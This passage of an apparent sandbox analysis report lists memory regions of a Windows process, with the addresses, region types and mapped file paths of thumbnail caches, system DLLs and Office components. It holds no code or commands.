"c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 969 start_va = 0x31f0000 end_va = 0x31f0fff entry_point = 0x31f0000 region_type = mapped_file name = "{7a77eb19-3f1f-481b-a465-50389a60f663}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{7A77EB19-3F1F-481B-A465-50389A60F663}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{7a77eb19-3f1f-481b-a465-50389a60f663}.2.ver0x0000000000000001.db") Region: id = 970 start_va = 0x3200000 end_va = 0x3200fff entry_point = 0x3200000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 971 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x3210000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 972 start_va = 0x3220000 end_va = 0x3220fff entry_point = 0x3220000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 973 start_va = 0x3230000 end_va = 0x326ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 974 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 975 start_va = 0x32b0000 end_va = 0x32b0fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 976 start_va = 0x32c0000 end_va = 0x32c0fff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 977 start_va = 0x32d0000 end_va = 0x32d0fff entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 978 start_va = 0x32e0000 end_va = 0x32e0fff entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 979 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 980 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x3300000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 981 start_va = 0x3310000 end_va = 0x3310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003310000" filename = "" Region: id = 982 start_va = 0x3320000 end_va = 0x3320fff entry_point = 0x3320000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 983 start_va = 0x3330000 end_va = 0x3334fff entry_point = 0x3330000 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 984 start_va = 0x3340000 end_va = 0x3373fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 985 start_va = 0x3380000 end_va = 0x3380fff entry_point = 0x3380000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 986 start_va = 0x3390000 end_va = 0x3390fff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 987 start_va = 0x33a0000 end_va = 0x33a0fff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 988 start_va = 0x33b0000 end_va = 0x33b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000033b0000" filename = "" Region: id = 989 start_va = 0x33c0000 end_va = 0x33c0fff entry_point = 0x33c0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 990 start_va = 0x33d0000 end_va = 0x34cffff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 991 start_va = 0x34d0000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 992 start_va = 0x3510000 end_va = 0x354ffff entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 993 start_va = 0x3590000 end_va = 0x3590fff entry_point = 0x3590000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 994 start_va = 0x35a0000 end_va = 0x35a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 995 start_va = 0x35b0000 end_va = 0x35b0fff entry_point = 0x35b0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 996 start_va = 0x35c0000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 997 start_va = 0x3600000 end_va = 0x3647fff entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 998 start_va = 0x3650000 end_va = 0x3651fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003650000" filename = "" Region: id = 999 start_va = 0x3660000 end_va = 0x3660fff entry_point = 0x3660000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1000 start_va = 0x3670000 end_va = 0x3670fff entry_point = 0x3670000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1001 start_va = 0x3680000 end_va = 0x3680fff entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 1002 start_va = 0x3690000 end_va = 0x3690fff entry_point = 0x3690000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 1003 start_va = 0x36a0000 end_va = 0x36a1fff entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 1004 start_va = 0x36b0000 end_va = 0x36b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000036b0000" filename = "" Region: id = 1005 start_va = 0x36c0000 end_va = 0x36fffff entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 1006 start_va = 0x3700000 end_va = 0x3700fff entry_point = 0x3700000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1007 start_va = 0x3710000 end_va = 0x3710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003710000" filename = "" Region: id = 1008 start_va = 0x3720000 end_va = 0x3720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003720000" filename = "" Region: id = 1009 start_va = 0x3730000 end_va = 0x3730fff entry_point = 0x3730000 region_type = mapped_file name = "msctf.dll.mui" filename = "\\Windows\\System32\\en-US\\msctf.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msctf.dll.mui") Region: id = 1010 start_va = 0x3740000 end_va = 0x3741fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003740000" filename = "" Region: id = 1011 start_va = 0x3750000 end_va = 0x3751fff entry_point = 0x3750000 region_type = mapped_file name = "msutb.dll.mui" filename = "\\Windows\\System32\\en-US\\msutb.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\msutb.dll.mui") Region: id = 1012 start_va = 0x3760000 end_va = 0x379ffff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 1013 start_va = 0x37a0000 end_va = 0x37a0fff entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 1014 start_va = 0x37b0000 end_va = 0x37b0fff entry_point = 0x0 region_type = private name = "private_0x00000000037b0000" filename = "" Region: id = 1015 start_va = 0x37c0000 end_va = 0x37c0fff entry_point = 0x37c0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1016 start_va = 0x37e0000 end_va = 0x37e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037e0000" filename = "" Region: id = 1017 start_va = 0x37f0000 end_va = 0x382ffff entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 1018 start_va = 0x3870000 end_va = 0x38bffff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 1019 start_va = 0x3900000 end_va = 0x393ffff entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1020 start_va = 0x3940000 end_va = 0x3d41fff entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 1021 start_va = 0x3d50000 end_va = 0x3d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 1022 start_va = 0x3d90000 end_va = 0x3d96fff entry_point = 0x3d90000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 1023 start_va = 0x3da0000 end_va = 0x3da1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003da0000" filename = "" Region: id = 1024 start_va = 0x3de0000 end_va = 0x3deffff entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 1025 start_va = 0x3e00000 end_va = 0x3e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1026 start_va = 0x3ef0000 end_va = 0x3f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 1027 start_va = 0x3f30000 end_va = 0x402ffff entry_point = 0x3f30000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1028 start_va = 0x4030000 end_va = 0x406ffff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 1029 start_va = 0x4070000 end_va = 0x40affff entry_point = 0x0 region_type = private name = "private_0x0000000004070000" filename = "" Region: id = 1030 start_va = 0x40e0000 end_va = 0x411ffff entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 1031 start_va = 0x41d0000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1032 start_va = 0x4210000 end_va = 0x424ffff entry_point = 0x0 region_type = private name = "private_0x0000000004210000" filename = "" Region: id = 1033 start_va = 0x4290000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 1034 start_va = 0x42e0000 end_va = 0x431ffff entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 1035 start_va = 0x4330000 end_va = 0x436ffff entry_point = 0x0 region_type = private name = "private_0x0000000004330000" filename = "" Region: id = 1036 start_va = 0x4380000 end_va = 0x43bffff entry_point = 0x0 region_type = private name = "private_0x0000000004380000" filename = "" Region: id = 1037 start_va = 0x4400000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1038 start_va = 0x4410000 end_va = 0x444ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 1039 start_va = 0x4450000 end_va = 0x450ffff entry_point = 0x4450000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1040 start_va = 0x4520000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 1041 start_va = 0x4720000 end_va = 0x5a74fff entry_point = 0x4720000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1042 start_va = 0x5a80000 end_va = 0x5b7ffff entry_point = 0x5a80000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1043 start_va = 0x5b80000 end_va = 0x5bbffff entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1044 start_va = 0x5c70000 end_va = 0x5caffff entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 1045 start_va = 0x5cb0000 end_va = 0x5ceffff entry_point = 0x0 region_type = private name = "private_0x0000000005cb0000" filename = "" Region: id = 1046 start_va = 0x5d20000 end_va = 0x5d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005d20000" filename = "" Region: id = 1047 start_va = 0x5dd0000 end_va = 0x5e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 1048 start_va = 0x5e10000 end_va = 0x610ffff entry_point = 0x0 region_type = private name = "private_0x0000000005e10000" filename = "" Region: id = 1049 start_va = 0x6110000 end_va = 0x620ffff entry_point = 0x6110000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1050 start_va = 0x6210000 end_va = 0x630ffff entry_point = 0x6210000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1051 start_va = 0x6710000 end_va = 0x680ffff entry_point = 0x6710000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1052 start_va = 0x6810000 end_va = 0x690ffff entry_point = 0x6810000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1053 start_va = 0x6910000 end_va = 0x6d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006910000" filename = "" Region: id = 1054 start_va = 0x6c130000 end_va = 0x6c235fff entry_point = 0x6c130000 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 1055 start_va = 0x6c240000 end_va = 0x6c359fff entry_point = 0x6c240000 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 1056 start_va = 0x6cff0000 end_va = 0x6da6ffff entry_point = 0x6cff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1057 start_va = 0x6de10000 end_va = 0x6de3dfff entry_point = 0x6de10000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1058 start_va = 0x6e560000 end_va = 0x6e595fff entry_point = 0x6e560000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1059 start_va = 0x6e670000 end_va = 0x6e6f8fff entry_point = 0x6e670000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1060 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1061 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1062 start_va = 0x6e9c0000 end_va = 0x6e9effff entry_point = 0x6e9c0000 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 1063 start_va = 0x6e9f0000 end_va = 0x6ea21fff entry_point = 0x6e9f0000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1064 start_va = 0x6ece0000 end_va = 0x6ee77fff entry_point = 0x6ece0000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 1065 start_va = 0x6ee80000 end_va = 0x6ee91fff entry_point = 0x6ee80000 region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 1066 start_va = 0x6eef0000 end_va = 0x6eef3fff entry_point = 0x6eef0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1067 start_va = 0x6ef10000 end_va = 0x6ef67fff entry_point = 0x6ef10000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 1068 start_va = 0x6ef70000 end_va = 0x6ef99fff entry_point = 0x6ef70000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1069 start_va = 0x6efa0000 end_va = 0x6efd4fff entry_point = 0x6efa0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1070 start_va = 0x6f040000 end_va = 0x6f27ffff entry_point = 0x6f040000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1071 start_va = 0x6f280000 end_va = 0x6f286fff entry_point = 0x6f280000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 1072 start_va = 0x6f290000 end_va = 0x6f2f0fff entry_point = 0x6f290000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1073 start_va = 0x6f300000 end_va = 0x6f577fff entry_point = 0x6f300000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 1074 start_va = 0x6f580000 end_va = 0x6f588fff entry_point = 0x6f580000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1075 start_va = 0x6f590000 end_va = 0x6f5bdfff entry_point = 0x6f590000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1076 start_va = 0x6f770000 end_va = 0x6f7bdfff entry_point = 0x6f770000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1077 start_va = 0x6f850000 end_va = 0x6f8c7fff entry_point = 0x6f850000 region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 1078 start_va = 0x6f8d0000 end_va = 0x6f8e9fff entry_point = 0x6f8d0000 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 1079 start_va = 0x70200000 end_va = 0x70250fff entry_point = 0x70200000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1080 start_va = 0x70510000 end_va = 0x7053bfff entry_point = 0x70510000 region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 1081 start_va = 0x70550000 end_va = 0x70555fff entry_point = 0x70550000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 1082 start_va = 0x70560000 end_va = 0x705cffff entry_point = 0x70560000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1083 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1084 start_va = 0x705e0000 end_va = 0x705e8fff entry_point = 0x705e0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 1085 start_va = 0x705f0000 end_va = 0x70659fff entry_point = 0x705f0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1086 start_va = 0x70660000 end_va = 0x70ec3fff entry_point = 0x70660000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 1087 start_va = 0x70ed0000 end_va = 0x712e9fff entry_point = 0x70ed0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 1088 start_va = 0x712f0000 end_va = 0x7131afff entry_point = 0x712f0000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 1089 start_va = 0x71320000 end_va = 0x713adfff entry_point = 0x71320000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 1090 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 1091 start_va = 0x71460000 end_va = 0x7186afff entry_point = 0x71460000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 1092 start_va = 0x71870000 end_va = 0x718a0fff entry_point = 0x71870000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 1093 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1094 start_va = 0x71930000 end_va = 0x71a9efff entry_point = 0x71930000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1095 start_va = 0x71d30000 end_va = 0x71d41fff entry_point = 0x71d30000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1096 start_va = 0x71de0000 end_va = 0x71de8fff entry_point = 0x71de0000 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 1097 start_va = 0x71df0000 end_va = 0x71dfefff entry_point = 0x71df0000 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 1098 start_va = 0x71e60000 end_va = 0x71e75fff entry_point = 0x71e60000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1099 start_va = 0x71f90000 end_va = 0x72072fff entry_point = 0x71f90000 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 1100 start_va = 0x72080000 end_va = 0x720b9fff entry_point = 0x72080000 region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 1101 start_va = 0x720c0000 end_va = 0x72191fff entry_point = 0x720c0000 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 1102 start_va = 0x721b0000 end_va = 0x721dafff entry_point = 0x721b0000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 1103 start_va = 0x721e0000 end_va = 0x7222efff entry_point = 0x721e0000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1104 start_va = 0x72230000 end_va = 0x72293fff entry_point = 0x72230000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1105 start_va = 0x722a0000 end_va = 0x72359fff entry_point = 0x722a0000 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 1106 start_va = 0x72360000 end_va = 0x7239bfff entry_point = 0x72360000 region_type = mapped_file name = "oleacc.dll" filename = 